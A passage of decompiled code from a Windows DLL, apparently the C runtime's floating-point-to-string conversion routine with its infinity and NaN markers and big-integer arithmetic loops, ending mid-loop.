                                                                                        				 *_t1189 = _t748;
                                                                                        				 *((intOrPtr*)(_t1189 + 8)) = _t1058;
                                                                                        				_t1190 = _a4;
                                                                                        				if((_t1238 & 0x7ff00000) != 0) {
                                                                                        					L5:
                                                                                        					_t753 = E10009C05( &_a4);
                                                                                        					_pop(_t1073);
                                                                                        					__eflags = _t753;
                                                                                        					if(_t753 != 0) {
                                                                                        						_t1073 = _v1924;
                                                                                        						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                                                                        					}
                                                                                        					_t754 = _t753 - 1;
                                                                                        					__eflags = _t754;
                                                                                        					if(_t754 == 0) {
                                                                                        						_push("1#INF");
                                                                                        						goto L308;
                                                                                        					} else {
                                                                                        						_t778 = _t754 - 1;
                                                                                        						__eflags = _t778;
                                                                                        						if(_t778 == 0) {
                                                                                        							_push("1#QNAN");
                                                                                        							goto L308;
                                                                                        						} else {
                                                                                        							_t779 = _t778 - 1;
                                                                                        							__eflags = _t779;
                                                                                        							if(_t779 == 0) {
                                                                                        								_push("1#SNAN");
                                                                                        								goto L308;
                                                                                        							} else {
                                                                                        								__eflags = _t779 == 1;
                                                                                        								if(_t779 == 1) {
                                                                                        									_push("1#IND");
                                                                                        									goto L308;
                                                                                        								} else {
                                                                                        									_v1928 = _v1928 & 0x00000000;
                                                                                        									_a4 = _t1190;
                                                                                        									_a8 = _t1238 & 0x7fffffff;
                                                                                        									_t1290 = _a4;
                                                                                        									asm("fst qword [ebp-0x768]");
                                                                                        									_t1192 = _v1896;
                                                                                        									_v1916 = _a12 + 1;
                                                                                        									_t1080 = _t1192 >> 0x14;
                                                                                        									_t785 = _t1080 & 0x000007ff;
                                                                                        									__eflags = _t785;
                                                                                        									if(_t785 != 0) {
                                                                                        										_t1145 = 0;
                                                                                        										_t785 = 0;
                                                                                        										__eflags = 0;
                                                                                        									} else {
                                                                                        										_t1145 = 1;
                                                                                        									}
                                                                                        									_t1193 = _t1192 & 0x000fffff;
                                                                                        									_t1061 = _v1900 + _t785;
                                                                                        									asm("adc edi, esi");
                                                                                        									__eflags = _t1145;
                                                                                        									_t1081 = _t1080 & 0x000007ff;
                                                                                        									_t1244 = _t1081 - 0x434 + (0 | _t1145 != 0x00000000) + 1;
                                                                                        									_v1872 = _t1244;
                                                                                        									E1000F530(_t1081, _t1290);
                                                                                        									_push(_t1081);
                                                                                        									_push(_t1081);
                                                                                        									 *_t1278 = _t1290;
                                                                                        									_t791 = E100126A0(E1000F640(_t1193, _t1244), _t1290);
                                                                                        									_v1904 = _t791;
                                                                                        									__eflags = _t791 - 0x7fffffff;
                                                                                        									if(_t791 == 0x7fffffff) {
                                                                                        										L16:
                                                                                        										__eflags = 0;
                                                                                        										_v1904 = 0;
                                                                                        									} else {
                                                                                        										__eflags = _t791 - 0x80000000;
                                                                                        										if(_t791 == 0x80000000) {
                                                                                        											goto L16;
                                                                                        										}
                                                                                        									}
                                                                                        									_v468 = _t1061;
                                                                                        									__eflags = _t1193;
                                                                                        									_v464 = _t1193;
                                                                                        									_t1064 = (0 | _t1193 != 0x00000000) + 1;
                                                                                        									_v472 = _t1064;
                                                                                        									__eflags = _t1244;
                                                                                        									if(_t1244 < 0) {
                                                                                        										__eflags = _t1244 - 0xfffffc02;
                                                                                        										if(_t1244 == 0xfffffc02) {
                                                                                        											L101:
                                                                                        											_t793 =  *((intOrPtr*)(_t1275 + _t1064 * 4 - 0x1d4));
                                                                                        											_t195 =  &_v1896;
                                                                                        											 *_t195 = _v1896 & 0x00000000;
                                                                                        											__eflags =  *_t195;
                                                                                        											asm("bsr eax, eax");
                                                                                        											if( *_t195 == 0) {
                                                                                        												_t1084 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												_t1084 = _t793 + 1;
                                                                                        											}
                                                                                        											_t794 = 0x20;
                                                                                        											_t795 = _t794 - _t1084;
                                                                                        											__eflags = _t795 - 1;
                                                                                        											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
                                                                                        											__eflags = _t1064 - 0x73;
                                                                                        											_v1865 = _t796;
                                                                                        											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
                                                                                        											__eflags = _t1064 - 0x73;
                                                                                        											if(_t1064 != 0x73) {
                                                                                        												L107:
                                                                                        												_t797 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												__eflags = _t796;
                                                                                        												if(_t796 == 0) {
                                                                                        													goto L107;
                                                                                        												} else {
                                                                                        													_t797 = 1;
                                                                                        												}
                                                                                        											}
                                                                                        											__eflags = _t1085;
                                                                                        											if(_t1085 != 0) {
                                                                                        												L126:
                                                                                        												_v1400 = _v1400 & 0x00000000;
                                                                                        												_t224 =  &_v472;
                                                                                        												 *_t224 = _v472 & 0x00000000;
                                                                                        												__eflags =  *_t224;
                                                                                        												E1000BBAD( &_v468, 0x1cc,  &_v1396, 0);
                                                                                        												_t1278 =  &(_t1278[4]);
                                                                                        											} else {
                                                                                        												__eflags = _t797;
                                                                                        												if(_t797 != 0) {
                                                                                        													goto L126;
                                                                                        												} else {
                                                                                        													_t1112 = 0x72;
                                                                                        													__eflags = _t1064 - _t1112;
                                                                                        													if(_t1064 < _t1112) {
                                                                                        														_t1112 = _t1064;
                                                                                        													}
                                                                                        													__eflags = _t1112 - 0xffffffff;
                                                                                        													if(_t1112 != 0xffffffff) {
                                                                                        														_t1262 = _t1112;
                                                                                        														_t1220 =  &_v468 + _t1112 * 4;
                                                                                        														_v1880 = _t1220;
                                                                                        														while(1) {
                                                                                        															__eflags = _t1262 - _t1064;
                                                                                        															if(_t1262 >= _t1064) {
                                                                                        																_t208 =  &_v1876;
                                                                                        																 *_t208 = _v1876 & 0x00000000;
                                                                                        																__eflags =  *_t208;
                                                                                        															} else {
                                                                                        																_v1876 =  *_t1220;
                                                                                        															}
                                                                                        															_t210 = _t1262 - 1; // 0x70
                                                                                        															__eflags = _t210 - _t1064;
                                                                                        															if(_t210 >= _t1064) {
                                                                                        																_t1172 = 0;
                                                                                        																__eflags = 0;
                                                                                        															} else {
                                                                                        																_t1172 =  *(_t1220 - 4);
                                                                                        															}
                                                                                        															_t1220 = _t1220 - 4;
                                                                                        															_t975 = _v1880;
                                                                                        															_t1262 = _t1262 - 1;
                                                                                        															 *_t975 = _t1172 >> 0x0000001f ^ _v1876 + _v1876;
                                                                                        															_v1880 = _t975 - 4;
                                                                                        															__eflags = _t1262 - 0xffffffff;
                                                                                        															if(_t1262 == 0xffffffff) {
                                                                                        																break;
                                                                                        															}
                                                                                        															_t1064 = _v472;
                                                                                        														}
                                                                                        														_t1244 = _v1872;
                                                                                        													}
                                                                                        													__eflags = _v1865;
                                                                                        													if(_v1865 == 0) {
                                                                                        														_v472 = _t1112;
                                                                                        													} else {
                                                                                        														_t218 = _t1112 + 1; // 0x73
                                                                                        														_v472 = _t218;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											_t1196 = 1 - _t1244;
                                                                                        											E10003E50(_t1196,  &_v1396, 0, 1);
                                                                                        											__eflags = 1;
                                                                                        											 *(_t1275 + 0xbad63d) = 1 << (_t1196 & 0x0000001f);
                                                                                        											_t806 = 0xbadbae;
                                                                                        										} else {
                                                                                        											_v1396 = _v1396 & 0x00000000;
                                                                                        											_t1113 = 2;
                                                                                        											_v1392 = 0x100000;
                                                                                        											_v1400 = _t1113;
                                                                                        											__eflags = _t1064 - _t1113;
                                                                                        											if(_t1064 == _t1113) {
                                                                                        												_t1176 = 0;
                                                                                        												__eflags = 0;
                                                                                        												while(1) {
                                                                                        													_t977 =  *((intOrPtr*)(_t1275 + _t1176 - 0x570));
                                                                                        													__eflags = _t977 -  *((intOrPtr*)(_t1275 + _t1176 - 0x1d0));
                                                                                        													if(_t977 !=  *((intOrPtr*)(_t1275 + _t1176 - 0x1d0))) {
                                                                                        														goto L101;
                                                                                        													}
                                                                                        													_t1176 = _t1176 + 4;
                                                                                        													__eflags = _t1176 - 8;
                                                                                        													if(_t1176 != 8) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														_t166 =  &_v1896;
                                                                                        														 *_t166 = _v1896 & 0x00000000;
                                                                                        														__eflags =  *_t166;
                                                                                        														asm("bsr eax, edi");
                                                                                        														if( *_t166 == 0) {
                                                                                        															_t1177 = 0;
                                                                                        															__eflags = 0;
                                                                                        														} else {
                                                                                        															_t1177 = _t977 + 1;
                                                                                        														}
                                                                                        														_t978 = 0x20;
                                                                                        														_t1263 = _t1113;
                                                                                        														__eflags = _t978 - _t1177 - _t1113;
                                                                                        														_t980 =  &_v460;
                                                                                        														_v1880 = _t980;
                                                                                        														_t1221 = _t980;
                                                                                        														_t171 =  &_v1865;
                                                                                        														 *_t171 = _t978 - _t1177 - _t1113 > 0;
                                                                                        														__eflags =  *_t171;
                                                                                        														while(1) {
                                                                                        															__eflags = _t1263 - _t1064;
                                                                                        															if(_t1263 >= _t1064) {
                                                                                        																_t173 =  &_v1876;
                                                                                        																 *_t173 = _v1876 & 0x00000000;
                                                                                        																__eflags =  *_t173;
                                                                                        															} else {
                                                                                        																_v1876 =  *_t1221;
                                                                                        															}
                                                                                        															_t175 = _t1263 - 1; // 0x0
                                                                                        															__eflags = _t175 - _t1064;
                                                                                        															if(_t175 >= _t1064) {
                                                                                        																_t1178 = 0;
                                                                                        																__eflags = 0;
                                                                                        															} else {
                                                                                        																_t1178 =  *(_t1221 - 4);
                                                                                        															}
                                                                                        															_t1221 = _t1221 - 4;
                                                                                        															_t984 = _v1880;
                                                                                        															_t1263 = _t1263 - 1;
                                                                                        															 *_t984 = _t1178 >> 0x0000001e ^ _v1876 << 0x00000002;
                                                                                        															_v1880 = _t984 - 4;
                                                                                        															__eflags = _t1263 - 0xffffffff;
                                                                                        															if(_t1263 == 0xffffffff) {
                                                                                        																break;
                                                                                        															}
                                                                                        															_t1064 = _v472;
                                                                                        														}
                                                                                        														__eflags = _v1865;
                                                                                        														_t1114 = _t1113 - _v1872;
                                                                                        														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
                                                                                        														_t1223 = _t1114 >> 5;
                                                                                        														_v1884 = _t1114;
                                                                                        														_t1265 = _t1223 << 2;
                                                                                        														E10003E50(_t1223,  &_v1396, 0, _t1265);
                                                                                        														 *(_t1275 + _t1265 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                                                                        														_t806 = _t1223 + 1;
                                                                                        													}
                                                                                        													goto L128;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        										L128:
                                                                                        										_v1400 = _t806;
                                                                                        										_t1067 = 0x1cc;
                                                                                        										_v936 = _t806;
                                                                                        										__eflags = _t806 << 2;
                                                                                        										E1000BBAD( &_v932, 0x1cc,  &_v1396, _t806 << 2);
                                                                                        										_t1281 =  &(_t1278[7]);
                                                                                        									} else {
                                                                                        										_v1396 = _v1396 & 0x00000000;
                                                                                        										_t1266 = 2;
                                                                                        										_v1392 = 0x100000;
                                                                                        										_v1400 = _t1266;
                                                                                        										__eflags = _t1064 - _t1266;
                                                                                        										if(_t1064 != _t1266) {
                                                                                        											L53:
                                                                                        											_t995 = _v1872 + 1;
                                                                                        											_t996 = _t995 & 0x0000001f;
                                                                                        											_t1117 = 0x20;
                                                                                        											_v1876 = _t996;
                                                                                        											_t1225 = _t995 >> 5;
                                                                                        											_v1872 = _t1225;
                                                                                        											_v1908 = _t1117 - _t996;
                                                                                        											_t999 = E10012680(1, _t1117 - _t996, 0);
                                                                                        											_t1119 =  *((intOrPtr*)(_t1275 + _t1064 * 4 - 0x1d4));
                                                                                        											_t1000 = _t999 - 1;
                                                                                        											_t108 =  &_v1896;
                                                                                        											 *_t108 = _v1896 & 0x00000000;
                                                                                        											__eflags =  *_t108;
                                                                                        											asm("bsr ecx, ecx");
                                                                                        											_v1884 = _t1000;
                                                                                        											_v1912 =  !_t1000;
                                                                                        											if( *_t108 == 0) {
                                                                                        												_t1120 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												_t1120 = _t1119 + 1;
                                                                                        											}
                                                                                        											_t1002 = 0x20;
                                                                                        											_t1003 = _t1002 - _t1120;
                                                                                        											_t1183 = _t1064 + _t1225;
                                                                                        											__eflags = _v1876 - _t1003;
                                                                                        											_v1892 = _t1183;
                                                                                        											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
                                                                                        											__eflags = _t1183 - 0x73;
                                                                                        											_v1865 = _t1004;
                                                                                        											_t1121 = _t1120 & 0xffffff00 | _t1183 - 0x00000073 > 0x00000000;
                                                                                        											__eflags = _t1183 - 0x73;
                                                                                        											if(_t1183 != 0x73) {
                                                                                        												L59:
                                                                                        												_t1005 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												__eflags = _t1004;
                                                                                        												if(_t1004 == 0) {
                                                                                        													goto L59;
                                                                                        												} else {
                                                                                        													_t1005 = 1;
                                                                                        												}
                                                                                        											}
                                                                                        											__eflags = _t1121;
                                                                                        											if(_t1121 != 0) {
                                                                                        												L81:
                                                                                        												__eflags = 0;
                                                                                        												_t1067 = 0x1cc;
                                                                                        												_v1400 = 0;
                                                                                        												_v472 = 0;
                                                                                        												E1000BBAD( &_v468, 0x1cc,  &_v1396, 0);
                                                                                        												_t1278 =  &(_t1278[4]);
                                                                                        											} else {
                                                                                        												__eflags = _t1005;
                                                                                        												if(_t1005 != 0) {
                                                                                        													goto L81;
                                                                                        												} else {
                                                                                        													_t1122 = 0x72;
                                                                                        													__eflags = _t1183 - _t1122;
                                                                                        													if(_t1183 >= _t1122) {
                                                                                        														_t1183 = _t1122;
                                                                                        														_v1892 = _t1122;
                                                                                        													}
                                                                                        													_t1015 = _t1183;
                                                                                        													_v1880 = _t1015;
                                                                                        													__eflags = _t1183 - 0xffffffff;
                                                                                        													if(_t1183 != 0xffffffff) {
                                                                                        														_t1184 = _v1872;
                                                                                        														_t1268 = _t1183 - _t1184;
                                                                                        														__eflags = _t1268;
                                                                                        														_t1126 =  &_v468 + _t1268 * 4;
                                                                                        														_v1888 = _t1126;
                                                                                        														while(1) {
                                                                                        															__eflags = _t1015 - _t1184;
                                                                                        															if(_t1015 < _t1184) {
                                                                                        																break;
                                                                                        															}
                                                                                        															__eflags = _t1268 - _t1064;
                                                                                        															if(_t1268 >= _t1064) {
                                                                                        																_t1228 = 0;
                                                                                        																__eflags = 0;
                                                                                        															} else {
                                                                                        																_t1228 =  *_t1126;
                                                                                        															}
                                                                                        															__eflags = _t1268 - 1 - _t1064;
                                                                                        															if(_t1268 - 1 >= _t1064) {
                                                                                        																_t1020 = 0;
                                                                                        																__eflags = 0;
                                                                                        															} else {
                                                                                        																_t1020 =  *(_t1126 - 4);
                                                                                        															}
                                                                                        															_t1023 = _v1880;
                                                                                        															_t1126 = _v1888 - 4;
                                                                                        															_v1888 = _t1126;
                                                                                        															 *(_t1275 + _t1023 * 4 - 0x1d0) = (_t1228 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
                                                                                        															_t1015 = _t1023 - 1;
                                                                                        															_t1268 = _t1268 - 1;
                                                                                        															_v1880 = _t1015;
                                                                                        															__eflags = _t1015 - 0xffffffff;
                                                                                        															if(_t1015 != 0xffffffff) {
                                                                                        																_t1064 = _v472;
                                                                                        																continue;
                                                                                        															}
                                                                                        															break;
                                                                                        														}
                                                                                        														_t1183 = _v1892;
                                                                                        														_t1225 = _v1872;
                                                                                        														_t1266 = 2;
                                                                                        													}
                                                                                        													__eflags = _t1225;
                                                                                        													if(_t1225 != 0) {
                                                                                        														__eflags = 0;
                                                                                        														memset( &_v468, 0, _t1225 << 2);
                                                                                        														_t1278 =  &(_t1278[3]);
                                                                                        													}
                                                                                        													__eflags = _v1865;
                                                                                        													_t1067 = 0x1cc;
                                                                                        													if(_v1865 == 0) {
                                                                                        														_v472 = _t1183;
                                                                                        													} else {
                                                                                        														_v472 = _t1183 + 1;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											_v1392 = _v1392 & 0x00000000;
                                                                                        											_v1396 = _t1266;
                                                                                        											_v1400 = 1;
                                                                                        											_v936 = 1;
                                                                                        											_push(4);
                                                                                        										} else {
                                                                                        											_t1130 = 0;
                                                                                        											__eflags = 0;
                                                                                        											while(1) {
                                                                                        												__eflags =  *((intOrPtr*)(_t1275 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1275 + _t1130 - 0x1d0));
                                                                                        												if( *((intOrPtr*)(_t1275 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1275 + _t1130 - 0x1d0))) {
                                                                                        													goto L53;
                                                                                        												}
                                                                                        												_t1130 = _t1130 + 4;
                                                                                        												__eflags = _t1130 - 8;
                                                                                        												if(_t1130 != 8) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													_t1026 = _v1872 + 2;
                                                                                        													_t1027 = _t1026 & 0x0000001f;
                                                                                        													_t1131 = 0x20;
                                                                                        													_t1132 = _t1131 - _t1027;
                                                                                        													_v1888 = _t1027;
                                                                                        													_t1270 = _t1026 >> 5;
                                                                                        													_v1876 = _t1270;
                                                                                        													_v1908 = _t1132;
                                                                                        													_t1030 = E10012680(1, _t1132, 0);
                                                                                        													_v1896 = _v1896 & 0x00000000;
                                                                                        													_t1031 = _t1030 - 1;
                                                                                        													__eflags = _t1031;
                                                                                        													asm("bsr ecx, edi");
                                                                                        													_v1884 = _t1031;
                                                                                        													_v1912 =  !_t1031;
                                                                                        													if(_t1031 == 0) {
                                                                                        														_t1133 = 0;
                                                                                        														__eflags = 0;
                                                                                        													} else {
                                                                                        														_t1133 = _t1132 + 1;
                                                                                        													}
                                                                                        													_t1033 = 0x20;
                                                                                        													_t1034 = _t1033 - _t1133;
                                                                                        													_t1186 = _t1270 + 2;
                                                                                        													__eflags = _v1888 - _t1034;
                                                                                        													_v1880 = _t1186;
                                                                                        													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
                                                                                        													__eflags = _t1186 - 0x73;
                                                                                        													_v1865 = _t1035;
                                                                                        													_t1134 = _t1133 & 0xffffff00 | _t1186 - 0x00000073 > 0x00000000;
                                                                                        													__eflags = _t1186 - 0x73;
                                                                                        													if(_t1186 != 0x73) {
                                                                                        														L28:
                                                                                        														_t1036 = 0;
                                                                                        														__eflags = 0;
                                                                                        													} else {
                                                                                        														__eflags = _t1035;
                                                                                        														if(_t1035 == 0) {
                                                                                        															goto L28;
                                                                                        														} else {
                                                                                        															_t1036 = 1;
                                                                                        														}
                                                                                        													}
                                                                                        													__eflags = _t1134;
                                                                                        													if(_t1134 != 0) {
                                                                                        														L50:
                                                                                        														__eflags = 0;
                                                                                        														_t1067 = 0x1cc;
                                                                                        														_v1400 = 0;
                                                                                        														_v472 = 0;
                                                                                        														E1000BBAD( &_v468, 0x1cc,  &_v1396, 0);
                                                                                        														_t1278 =  &(_t1278[4]);
                                                                                        													} else {
                                                                                        														__eflags = _t1036;
                                                                                        														if(_t1036 != 0) {
                                                                                        															goto L50;
                                                                                        														} else {
                                                                                        															_t1137 = 0x72;
                                                                                        															__eflags = _t1186 - _t1137;
                                                                                        															if(_t1186 >= _t1137) {
                                                                                        																_t1186 = _t1137;
                                                                                        																_v1880 = _t1137;
                                                                                        															}
                                                                                        															_t1138 = _t1186;
                                                                                        															_v1892 = _t1138;
                                                                                        															__eflags = _t1186 - 0xffffffff;
                                                                                        															if(_t1186 != 0xffffffff) {
                                                                                        																_t1187 = _v1876;
                                                                                        																_t1272 = _t1186 - _t1187;
                                                                                        																__eflags = _t1272;
                                                                                        																_t1046 =  &_v468 + _t1272 * 4;
                                                                                        																_v1872 = _t1046;
                                                                                        																while(1) {
                                                                                        																	__eflags = _t1138 - _t1187;
                                                                                        																	if(_t1138 < _t1187) {
                                                                                        																		break;
                                                                                        																	}
                                                                                        																	__eflags = _t1272 - _t1064;
                                                                                        																	if(_t1272 >= _t1064) {
                                                                                        																		_t1234 = 0;
                                                                                        																		__eflags = 0;
                                                                                        																	} else {
                                                                                        																		_t1234 =  *_t1046;
                                                                                        																	}
                                                                                        																	__eflags = _t1272 - 1 - _t1064;
                                                                                        																	if(_t1272 - 1 >= _t1064) {
                                                                                        																		_t1048 = 0;
                                                                                        																		__eflags = 0;
                                                                                        																	} else {
                                                                                        																		_t1048 =  *(_v1872 - 4);
                                                                                        																	}
                                                                                        																	_t1143 = _v1892;
                                                                                        																	 *(_t1275 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1234 & _v1884) << _v1888;
                                                                                        																	_t1138 = _t1143 - 1;
                                                                                        																	_t1272 = _t1272 - 1;
                                                                                        																	_t1046 = _v1872 - 4;
                                                                                        																	_v1892 = _t1138;
                                                                                        																	_v1872 = _t1046;
                                                                                        																	__eflags = _t1138 - 0xffffffff;
                                                                                        																	if(_t1138 != 0xffffffff) {
                                                                                        																		_t1064 = _v472;
                                                                                        																		continue;
                                                                                        																	}
                                                                                        																	break;
                                                                                        																}
                                                                                        																_t1186 = _v1880;
                                                                                        																_t1270 = _v1876;
                                                                                        															}
                                                                                        															__eflags = _t1270;
                                                                                        															if(_t1270 != 0) {
                                                                                        																__eflags = 0;
                                                                                        																memset( &_v468, 0, _t1270 << 2);
                                                                                        																_t1278 =  &(_t1278[3]);
                                                                                        															}
                                                                                        															__eflags = _v1865;
                                                                                        															_t1067 = 0x1cc;
                                                                                        															if(_v1865 == 0) {
                                                                                        																_v472 = _t1186;
                                                                                        															} else {
                                                                                        																_v472 = _t1186 + 1;
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        													_v1392 = _v1392 & 0x00000000;
                                                                                        													_t1041 = 4;
                                                                                        													__eflags = 1;
                                                                                        													_v1396 = _t1041;
                                                                                        													_v1400 = 1;
                                                                                        													_v936 = 1;
                                                                                        													_push(_t1041);
                                                                                        												}
                                                                                        												goto L52;
                                                                                        											}
                                                                                        											goto L53;
                                                                                        										}
                                                                                        										L52:
                                                                                        										_push( &_v1396);
                                                                                        										_push(_t1067);
                                                                                        										_push( &_v932);
                                                                                        										E1000BBAD();
                                                                                        										_t1281 =  &(_t1278[4]);
                                                                                        									}
                                                                                        									_t811 = _v1904;
                                                                                        									_t1087 = 0xa;
                                                                                        									_v1912 = _t1087;
                                                                                        									__eflags = _t811;
                                                                                        									if(_t811 < 0) {
                                                                                        										_t812 =  ~_t811;
                                                                                        										_t813 = _t812 / _t1087;
                                                                                        										_v1880 = _t813;
                                                                                        										_t1088 = _t812 % _t1087;
                                                                                        										_v1884 = _t1088;
                                                                                        										__eflags = _t813;
                                                                                        										if(_t813 == 0) {
                                                                                        											L249:
                                                                                        											__eflags = _t1088;
                                                                                        											if(_t1088 != 0) {
                                                                                        												_t852 =  *(0x10015b7c + _t1088 * 4);
                                                                                        												_v1896 = _t852;
                                                                                        												__eflags = _t852;
                                                                                        												if(_t852 == 0) {
                                                                                        													L260:
                                                                                        													__eflags = 0;
                                                                                        													_push(0);
                                                                                        													_v472 = 0;
                                                                                        													_v2408 = 0;
                                                                                        													goto L261;
                                                                                        												} else {
                                                                                        													__eflags = _t852 - 1;
                                                                                        													if(_t852 != 1) {
                                                                                        														_t1099 = _v472;
                                                                                        														__eflags = _t1099;
                                                                                        														if(_t1099 != 0) {
                                                                                        															_t1203 = 0;
                                                                                        															_t1252 = 0;
                                                                                        															__eflags = 0;
                                                                                        															do {
                                                                                        																_t1157 = _t852 *  *(_t1275 + _t1252 * 4 - 0x1d0) >> 0x20;
                                                                                        																 *(_t1275 + _t1252 * 4 - 0x1d0) = _t852 *  *(_t1275 + _t1252 * 4 - 0x1d0) + _t1203;
                                                                                        																_t852 = _v1896;
                                                                                        																asm("adc edx, 0x0");
                                                                                        																_t1252 = _t1252 + 1;
                                                                                        																_t1203 = _t1157;
                                                                                        																__eflags = _t1252 - _t1099;
                                                                                        															} while (_t1252 != _t1099);
                                                                                        															__eflags = _t1203;
                                                                                        															if(_t1203 != 0) {
                                                                                        																_t859 = _v472;
                                                                                        																__eflags = _t859 - 0x73;
                                                                                        																if(_t859 >= 0x73) {
                                                                                        																	goto L260;
                                                                                        																} else {
                                                                                        																	 *(_t1275 + _t859 * 4 - 0x1d0) = _t1203;
                                                                                        																	_v472 = _v472 + 1;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											do {
                                                                                        												__eflags = _t813 - 0x26;
                                                                                        												if(_t813 > 0x26) {
                                                                                        													_t813 = 0x26;
                                                                                        												}
                                                                                        												_t1100 =  *(0x10015ae6 + _t813 * 4) & 0x000000ff;
                                                                                        												_v1872 = _t813;
                                                                                        												_v1400 = ( *(0x10015ae6 + _t813 * 4) & 0x000000ff) + ( *(0x10015ae7 + _t813 * 4) & 0x000000ff);
                                                                                        												E10003E50(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
                                                                                        												_t870 = E10005A60( &(( &_v1396)[_t1100]), 0x100151e0 + ( *(0x10015ae4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x10015ae7 + _t813 * 4) & 0x000000ff) << 2);
                                                                                        												_t1101 = _v1400;
                                                                                        												_t1281 =  &(_t1281[6]);
                                                                                        												_v1892 = _t1101;
                                                                                        												__eflags = _t1101 - 1;
                                                                                        												if(_t1101 > 1) {
                                                                                        													__eflags = _v472 - 1;
                                                                                        													if(_v472 > 1) {
                                                                                        														__eflags = _t1101 - _v472;
                                                                                        														_t1206 =  &_v1396;
                                                                                        														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
                                                                                        														__eflags = _t871;
                                                                                        														if(_t871 != 0) {
                                                                                        															_t1158 =  &_v468;
                                                                                        														} else {
                                                                                        															_t1206 =  &_v468;
                                                                                        															_t1158 =  &_v1396;
                                                                                        														}
                                                                                        														_v1908 = _t1158;
                                                                                        														__eflags = _t871;
                                                                                        														if(_t871 == 0) {
                                                                                        															_t1101 = _v472;
                                                                                        														}
                                                                                        														_v1876 = _t1101;
                                                                                        														__eflags = _t871;
                                                                                        														if(_t871 != 0) {
                                                                                        															_v1892 = _v472;
                                                                                        														}
                                                                                        														_t1159 = 0;
                                                                                        														_t1254 = 0;
                                                                                        														_v1864 = 0;
                                                                                        														__eflags = _t1101;
                                                                                        														if(_t1101 == 0) {
                                                                                        															L243:
                                                                                        															_v472 = _t1159;
                                                                                        															_t873 = _t1159 << 2;
                                                                                        															__eflags = _t873;
                                                                                        															_push(_t873);
                                                                                        															_t874 =  &_v1860;
                                                                                        															goto L244;
                                                                                        														} else {
                                                                                        															_t1207 = _t1206 -  &_v1860;
                                                                                        															__eflags = _t1207;
                                                                                        															_v1928 = _t1207;
                                                                                        															do {
                                                                                        																_t881 =  *(_t1275 + _t1207 + _t1254 * 4 - 0x740);
                                                                                        																_v1896 = _t881;
                                                                                        																__eflags = _t881;
                                                                                        																if(_t881 != 0) {
                                                                                        																	_t882 = 0;
                                                                                        																	_t1208 = 0;
                                                                                        																	_t1102 = _t1254;
                                                                                        																	_v1888 = 0;
                                                                                        																	__eflags = _v1892;
                                                                                        																	if(_v1892 == 0) {
                                                                                        																		L240:
                                                                                        																		__eflags = _t1102 - 0x73;
                                                                                        																		if(_t1102 == 0x73) {
                                                                                        																			goto L258;
                                                                                        																		} else {
                                                                                        																			_t1207 = _v1928;
                                                                                        																			_t1101 = _v1876;
                                                                                        																			goto L242;
                                                                                        																		}
                                                                                        																	} else {
                                                                                        																		while(1) {
                                                                                        																			__eflags = _t1102 - 0x73;
                                                                                        																			if(_t1102 == 0x73) {
                                                                                        																				goto L235;
                                                                                        																			}
                                                                                        																			__eflags = _t1102 - _t1159;
                                                                                        																			if(_t1102 == _t1159) {
                                                                                        																				 *(_t1275 + _t1102 * 4 - 0x740) =  *(_t1275 + _t1102 * 4 - 0x740) & 0x00000000;
                                                                                        																				_t894 = _t882 + 1 + _t1254;
                                                                                        																				__eflags = _t894;
                                                                                        																				_v1864 = _t894;
                                                                                        																				_t882 = _v1888;
                                                                                        																			}
                                                                                        																			_t889 =  *(_v1908 + _t882 * 4);
                                                                                        																			asm("adc edx, 0x0");
                                                                                        																			 *(_t1275 + _t1102 * 4 - 0x740) =  *(_t1275 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1208;
                                                                                        																			asm("adc edx, 0x0");
                                                                                        																			_t882 = _v1888 + 1;
                                                                                        																			_t1102 = _t1102 + 1;
                                                                                        																			_v1888 = _t882;
                                                                                        																			_t1208 = _t889 * _v1896 >> 0x20;
                                                                                        																			_t1159 = _v1864;
                                                                                        																			__eflags = _t882 - _v1892;
                                                                                        																			if(_t882 != _v1892) {
                                                                                        																				continue;
                                                                                        																			} else {
                                                                                        																				goto L235;
                                                                                        																			}
                                                                                        																			while(1) {
                                                                                        																				L235:
                                                                                        																				__eflags = _t1208;
                                                                                        																				if(_t1208 == 0) {
                                                                                        																					goto L240;
                                                                                        																				}
                                                                                        																				__eflags = _t1102 - 0x73;
                                                                                        																				if(_t1102 == 0x73) {
                                                                                        																					goto L258;
                                                                                        																				} else {
                                                                                        																					__eflags = _t1102 - _t1159;
                                                                                        																					if(_t1102 == _t1159) {
                                                                                        																						_t558 = _t1275 + _t1102 * 4 - 0x740;
                                                                                        																						 *_t558 =  *(_t1275 + _t1102 * 4 - 0x740) & 0x00000000;
                                                                                        																						__eflags =  *_t558;
                                                                                        																						_t564 = _t1102 + 1; // 0x1
                                                                                        																						_v1864 = _t564;
                                                                                        																					}
                                                                                        																					_t887 = _t1208;
                                                                                        																					_t1208 = 0;
                                                                                        																					 *(_t1275 + _t1102 * 4 - 0x740) =  *(_t1275 + _t1102 * 4 - 0x740) + _t887;
